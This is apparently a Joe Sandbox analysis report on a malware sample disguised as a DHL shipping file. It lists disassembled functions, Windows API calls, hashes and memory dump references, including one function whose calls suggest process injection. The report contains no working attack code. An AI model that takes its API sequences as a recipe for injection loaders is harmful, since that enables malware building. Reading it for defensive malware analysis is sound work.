                                                                                            • Instruction Fuzzy Hash: 05D05E7290032867DA20A7A5AC0EFCB3B6CEB05750F0002A1B755E2091EAB49984CBE0
                                                                                            Function 008A7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 008A82F5
                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 008A82FC
                                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 008A84DD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 146820519-0
                                                                                            • Opcode ID: 2bbf1106a60fc50c3e8953bfa07ce8a67ce887faee746a57466b691a956bde6a
                                                                                            • Instruction ID: 370975c3c3b097465509be80467b37fa8f265f33c6e9a47a8b3ecc70b1a28454
                                                                                            • Opcode Fuzzy Hash: 2bbf1106a60fc50c3e8953bfa07ce8a67ce887faee746a57466b691a956bde6a
                                                                                            • Instruction Fuzzy Hash: D0125971A08341DFD714DF28C484B6ABBE5FF89318F04895DE899CB252DB31E945CBA2
                                                                                            Function 00855AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 30af50f63f0156c66f54b38539ebd5f6c78546fc1a5fef9d2305a4b9da15e632
                                                                                            • Instruction ID: 4532417b34716ec50abc5e9ba0af8c81436edd1678fc9b845319abdd399f2c6e
                                                                                            • Opcode Fuzzy Hash: 30af50f63f0156c66f54b38539ebd5f6c78546fc1a5fef9d2305a4b9da15e632
                                                                                            • Instruction Fuzzy Hash: 8E51AE71D0061D9FCF119FA8C859EAE7BB8FF05326F140159E805EB292D7719E09CB62
                                                                                            Function 008210F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00821BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00821BF4
                                                                                              • Part of subcall function 00821BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00821BFC
                                                                                              • Part of subcall function 00821BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00821C07
                                                                                              • Part of subcall function 00821BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00821C12
                                                                                              • Part of subcall function 00821BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00821C1A
                                                                                              • Part of subcall function 00821BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00821C22
                                                                                              • Part of subcall function 00821B4A: RegisterWindowMessageW.USER32(00000004,?,008212C4), ref: 00821BA2
                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0082136A
                                                                                            • OleInitialize.OLE32 ref: 00821388
                                                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 008624AB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1986988660-0
                                                                                            • Opcode ID: 781bbbf3a070bfd0550d82f3867d373aac9b8a125814bd2685e1acdd5385fee8
                                                                                            • Instruction ID: 64ebfe2b15f0e5166c936f46ab28bd41d0db486434c3a3624dcd607c2fb9c4f3
                                                                                            • Opcode Fuzzy Hash: 781bbbf3a070bfd0550d82f3867d373aac9b8a125814bd2685e1acdd5385fee8
                                                                                            • Instruction Fuzzy Hash: CD71CEB4911204CFCF84EFBAA94DA753AE1FBAC784754823AD11AC7361EB304448CF55
                                                                                            Function 0088C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00823923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00823A04
                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0088C259
                                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 0088C261
                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0088C270
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconNotifyShell_Timer$Kill
                                                                                            • String ID:
                                                                                            • API String ID: 3500052701-0
                                                                                            • Opcode ID: 11a3c4321ca4306c89b34ed3f21bf34c66b7d82d455e91e589284d71cbf01952
                                                                                            • Instruction ID: 520c36f6b1397c61f4066ecbea653f3d1a49c2cff4cf2aeddeab5a5dec034d7e
                                                                                            • Opcode Fuzzy Hash: 11a3c4321ca4306c89b34ed3f21bf34c66b7d82d455e91e589284d71cbf01952
                                                                                            • Instruction Fuzzy Hash: 43318470904354AFEB629F748895BE7BBECFB06308F00049AD59AD7285C7745A84CB61
                                                                                            Function 008586AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(00000000,00000000,?,?,008585CC,?,008E8CC8,0000000C), ref: 00858704
                                                                                            • GetLastError.KERNEL32(?,008585CC,?,008E8CC8,0000000C), ref: 0085870E
                                                                                            • __dosmaperr.LIBCMT ref: 00858739
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                            • String ID:
                                                                                            • API String ID: 2583163307-0
                                                                                            • Opcode ID: c6eefef8e4ec87feabc05ad63e1b0e699527d2ec39123ad08b3c8e53d8733ba5
                                                                                            • Instruction ID: b97b34c023b47698c8155aa9cf412030889fe5194e43e7580360d33b06076ccb
                                                                                            • Opcode Fuzzy Hash: c6eefef8e4ec87feabc05ad63e1b0e699527d2ec39123ad08b3c8e53d8733ba5
                                                                                            • Instruction Fuzzy Hash: 6E014C326052209BD76062385859B7F6B85FB96776F25011AEC08EB2D2DEA08C898151
                                                                                            Function 0082DB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • TranslateMessage.USER32(?), ref: 0082DB7B
                                                                                            • DispatchMessageW.USER32(?), ref: 0082DB89
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0082DB9F
                                                                                            • Sleep.KERNEL32(0000000A), ref: 0082DBB1
                                                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00871CC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                            • String ID:
                                                                                            • API String ID: 3288985973-0
                                                                                            • Opcode ID: 2a8132c148f47fffa8fa149183a91d414b48964556b7c1b2e353bf20aed485e0
                                                                                            • Instruction ID: 390a12e89b02de7b90914040f9491f830ab796730d0f6d622accf9fed2cdaa4e
                                                                                            • Opcode Fuzzy Hash: 2a8132c148f47fffa8fa149183a91d414b48964556b7c1b2e353bf20aed485e0
                                                                                            • Instruction Fuzzy Hash: F5F0FE306543459BEB30CBB59C5DFEA77A8FB85350F104A29E65AC34D0DB30A488DB25
                                                                                            Function 00892FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00892CD4,?,?,?,00000004,00000001), ref: 00892FF2
                                                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00892CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00893006
                                                                                            • CloseHandle.KERNEL32(00000000,?,00892CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0089300D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                            • String ID:
                                                                                            • API String ID: 3397143404-0
                                                                                            • Opcode ID: 46aab531a992b32458ec3566415335e047ff995beb2f81de0d85a04684894b07
                                                                                            • Instruction ID: f222fe30d1c9f3395b3c696f3c6497879d77d035ec37895c057e664f72c68942
                                                                                            • Opcode Fuzzy Hash: 46aab531a992b32458ec3566415335e047ff995beb2f81de0d85a04684894b07
                                                                                            • Instruction Fuzzy Hash: 68E0863228021077D6312759BC0DF8B3B5CE78AB71F104320F759B61D046A0150142A8
                                                                                            Function 00831310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __Init_thread_footer.LIBCMT ref: 008317F6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Init_thread_footer
                                                                                            • String ID: CALL
                                                                                            • API String ID: 1385522511-4196123274
                                                                                            • Opcode ID: b0ee890a4620c5fc5ea9e62b9397fa0872ab01801785d053ad5de79a58e9fede
                                                                                            • Instruction ID: ebf5a7f10f34b0b620825f8820035120bcc4af119598d361bb2fe3a0968a7720
                                                                                            • Opcode Fuzzy Hash: b0ee890a4620c5fc5ea9e62b9397fa0872ab01801785d053ad5de79a58e9fede
                                                                                            • Instruction Fuzzy Hash: 80226B706082059FCB14DF18C488A2ABBE1FFC9714F18892DF59ACB362D771E855CB92
                                                                                            Function 00896EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 00896F6B
                                                                                              • Part of subcall function 00824ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824EFD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad_wcslen
                                                                                            • String ID: >>>AUTOIT SCRIPT<<<
                                                                                            • API String ID: 3312870042-2806939583
                                                                                            • Opcode ID: 89ae838175ddef078c211010ffcdf7b4b3f8b743adc804099ab6094097203c4a
                                                                                            • Instruction ID: bb694735312abd30587e9620b5485907fb25f7613c49dbaf07b4b0ffa4844e7a
                                                                                            • Opcode Fuzzy Hash: 89ae838175ddef078c211010ffcdf7b4b3f8b743adc804099ab6094097203c4a
                                                                                            • Instruction Fuzzy Hash: FEB15E315182118FCB14EF28D49196EB7E5FF94314F08896DF496D72A2EB30ED89CB92
                                                                                            Function 00822DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00862C8C
                                                                                              • Part of subcall function 00823AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00823A97,?,?,00822E7F,?,?,?,00000000), ref: 00823AC2
                                                                                              • Part of subcall function 00822DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00822DC4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Name$Path$FileFullLongOpen
                                                                                            • String ID: X
                                                                                            • API String ID: 779396738-3081909835
                                                                                            • Opcode ID: 5cb02db1bfdaed7f001a86141d3eb72d78e8aedf63680530cc3d8d86d0db0528
                                                                                            • Instruction ID: 83f1dbeef365533db76d8a93c24a3b58f2a43b6709e62ca1db117b1699354564
                                                                                            • Opcode Fuzzy Hash: 5cb02db1bfdaed7f001a86141d3eb72d78e8aedf63680530cc3d8d86d0db0528
                                                                                            • Instruction Fuzzy Hash: 8D219671A002AC9FCB01EF98D845BEE7BF8FF59314F004059E505E7241EBB856898FA1
                                                                                            Function 00823837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00823908
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconNotifyShell_
                                                                                            • String ID:
                                                                                            • API String ID: 1144537725-0
                                                                                            • Opcode ID: 6f6ddca7b566a7b5d4f5639db04161a83f8e16c61727dc6e9275ce853d2e32a5
                                                                                            • Instruction ID: 5bfaa5c92775a2fc03c6db9be2278732c64dd1363fa3fb1d658bb7ccc3c0429c
                                                                                            • Opcode Fuzzy Hash: 6f6ddca7b566a7b5d4f5639db04161a83f8e16c61727dc6e9275ce853d2e32a5
                                                                                            • Instruction Fuzzy Hash: 5D315A70604311DFD721DF24E894BA6BBE8FB49708F00092EF99AC7350E775AA84CB52
                                                                                            Function 00B62F2D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 00B636EB
                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00B63781
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00B637A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075924973.0000000000B61000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B61000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b61000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 2438371351-0
                                                                                            • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                            • Instruction ID: e309939edb32133436c8a3b3b8ba00ed2a7b72db379efbc79d8e15a326694468
                                                                                            • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                            • Instruction Fuzzy Hash: AF12CC24A24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4F81CF5A
                                                                                            Function 0083FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 544645111-0
                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                            • Instruction ID: aea26b4491444a59210f2df3191b57c6fa29756a77967f78758f137d8b2b16cd
                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                            • Instruction Fuzzy Hash: 2631F374A00109DBC718CF59D484969FBB1FF89304F2496A5E90ACB656D731EEC1CBC0
                                                                                            Function 00824ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00824E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00824EDD,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824E9C
                                                                                              • Part of subcall function 00824E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00824EAE
                                                                                              • Part of subcall function 00824E90: FreeLibrary.KERNEL32(00000000,?,?,00824EDD,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824EC0
                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824EFD
                                                                                              • Part of subcall function 00824E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00863CDE,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824E62
                                                                                              • Part of subcall function 00824E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00824E74
                                                                                              • Part of subcall function 00824E59: FreeLibrary.KERNEL32(00000000,?,?,00863CDE,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824E87
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$Load$AddressFreeProc
                                                                                            • String ID:
                                                                                            • API String ID: 2632591731-0
                                                                                            • Opcode ID: b0b25ada21e4e1679d24b1597d95eb93a1311b6ddbd0f509a36dbc6dbce6c410
                                                                                            • Instruction ID: f8bca9ad3fa220a00fc014de57b128d3f0d1fe6d3a19f3ffde79669255b6d09e
                                                                                            • Opcode Fuzzy Hash: b0b25ada21e4e1679d24b1597d95eb93a1311b6ddbd0f509a36dbc6dbce6c410
                                                                                            • Instruction Fuzzy Hash: C111E731610225AADF14BB68ED02FAD77A5FF90710F10442DF542E61C1DE749E859B61
                                                                                            Function 00858402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: __wsopen_s
                                                                                            • String ID:
                                                                                            • API String ID: 3347428461-0
                                                                                            • Opcode ID: 96f565b54689ee2ec9bcada9b147a56af82ff1fd039c72d12264c2f92b31df6a
                                                                                            • Instruction ID: aa336161d7b37ca416f3ad8b013694b46bdb9b8ff90fc1d181c67c705d614f6a
                                                                                            • Opcode Fuzzy Hash: 96f565b54689ee2ec9bcada9b147a56af82ff1fd039c72d12264c2f92b31df6a
                                                                                            • Instruction Fuzzy Hash: 2C11257190410AAFCB05DF58E94099A7BF9FF48314F10405AFC09EB312DA30DA158BA9
                                                                                            Function 0084E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
